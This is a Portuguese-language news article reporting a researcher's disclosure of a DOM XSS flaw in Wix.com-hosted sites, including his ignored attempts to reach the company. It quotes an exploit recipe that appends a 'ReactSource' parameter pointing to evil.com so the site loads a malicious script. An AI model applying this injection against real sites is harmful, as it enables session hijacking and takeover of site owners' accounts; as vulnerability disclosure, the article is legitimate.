Você já ouviu falar de wix(.)com?
Wix.com é uma plataforma de desenvolvimento web baseada em nuvem projetado para os usuários para sites em HTML5 e sites móveis através do uso de ferramentas on-line de arrastar e soltar da empresa.
Infelizmente, um bug XSS sério foi descoberto na plataforma, atualmente colocando em perigo milhões de sites e usuários.
Wix(.)com tem um bug de XSS sério, pesquisador diz
Conforme relatado por pesquisadores de segurança, o serviço hospeda milhões de sites com 87 milhões de usuários registrados. A parte assustadora é que todos os usuários estão propensos a esta vulnerabilidade XSS. Este último pode ser implantado por invasores como um worm para assumir o controle de contas de administrador. Uma vez feito isso, os invasores obtêm controle total sobre os sites comprometidos.
A vulnerabilidade XSS foi divulgada por Matt Austin da Contrast Security. Ele escrevi:
O Wix.com tem uma vulnerabilidade grave de DOM XSS que permite a um invasor controle completo sobre qualquer site hospedado no Wix. Simplesmente adicionando um único parâmetro a qualquer site criado no Wix, o invasor pode fazer com que seu JavaScript seja carregado e executado como parte do site de destino.
Uma simples linha de código é suficiente para acionar o bug
O ataque pode ser desencadeado apenas pela adição de um comando de redirecionamento simples a qualquer URL do wix(.)com. O resultado está sendo redirecionado para um JavaScrip malicioso. Veja um exemplo abaixo:
- Adicionar: ?ReactSource = https://evil.com para qualquer URL de qualquer site criado em wix.com.
- Certifique-se de que evil.com hospeda um arquivo malicioso em /packages-bin/wixCodeInit/wixCodeInit.min.js
Essas linhas simples de código são suficientes para que os invasores tenham certeza de que seu JS está carregado e ativado como parte do site de destino, o pesquisador explica. Os invasores também podem obter acesso a cookies e recursos da sessão de administrador, um cenário muito ruim, de fato. Sempre que um cookie de sessão é coletado, os atacantes podem posicionar livremente o DOM XSS em um iframe. Isso é feito para hospedar conteúdo malicioso em qualquer site administrado por uma operadora.
Após o sucesso, este ataque pode ser aproveitado para distribuição de malware, modificação do site, mineração criptomoeda, alterando credenciais de conta, etc.
O que o Wix disse?
Quanto à comunicação com wix(.)com, o pesquisador compartilha a seguinte experiência:
outubro 10: Cria tíquete de suporte solicitando contato de segurança
outubro 11: Entre em contato com @wix no Twitter para encontrar um contato de segurança. Respondeu para usar o suporte padrão. Deu detalhes no tíquete criado. A página de ingressos não funciona mais. https://www.wix.com/support/html5/contact.
outubro 14: Recebeu a resposta padrão “Estamos investigando o assunto e faremos o acompanhamento o mais rápido possível” do Wix.
outubro 20: Responder ao tíquete solicitando uma atualização. (sem resposta)
outubro 27: Segundo pedido de atualização. (sem resposta)
Em outubro 28, o pesquisador finalmente recebeu uma resposta que afirmava que o
grupo que você tentou contatar (segurança) pode não existir, ou você pode não ter permissão para postar mensagens no grupo.
Não obstante, o CEO da Wix Avishai Abrahami acabou admitindo que certos aspectos da plataforma são baseados na biblioteca de código aberto WordPress. Ele afirma que tudo o que foi melhorado foi devolvido à comunidade, relatórios ZDNet.